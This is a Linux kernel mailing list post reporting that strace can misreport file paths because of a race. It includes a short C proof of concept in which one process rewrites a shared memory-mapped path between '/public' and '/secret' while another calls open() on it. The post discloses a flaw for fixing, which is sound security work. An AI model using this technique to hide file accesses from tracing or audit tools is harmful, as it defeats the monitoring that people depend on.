When you see snippet from strace, that says:
open("/etc/passwd", O_RDONLY) = 3
Do you trust it? You should not.
Malicious program could open _any_ file on filesystem with this
syscall. Here is example of such malicious program:
void
main(void)
{
char *c = 0x94000000;
open( "/tmp/delme", O_RDWR );
mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0);
*c = 0;
if (fork()) {
while(1) {
strcpy( c, "/public" );
strcpy( c, "/secret" );
}
} else
while (1)
open( c, 0 );
}
Depending on races, /public or /secret is printed with strace. This
can be reproduced even on UP and easiest way to do so is to make
/public file readable, and then look if you get
[pid 224] open("/public", O_RDONLY) = 718
[pid 224] open("/secret", O_RDONLY) = 719
[pid 224] open("/public", O_RDONLY) = 720
snippet like this. It is impossible for kernel to open non-existent
file; that means that strace printed something that did not actually
happen.
Any ideas how to get rid of this problem? It is nasty. It is very
nasty and makes strace unusable for anything security-sensitive.
Pavel
PS: You don't need two processes sharing memory. Memory-mapped file
will do the job. This was just illustration.
-- I'm pavel@ucw.cz. "In my country we have almost anarchy and I don't care." Panos Katsaloulis describing me w.r.t. patents me at discuss@linmodems.org- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/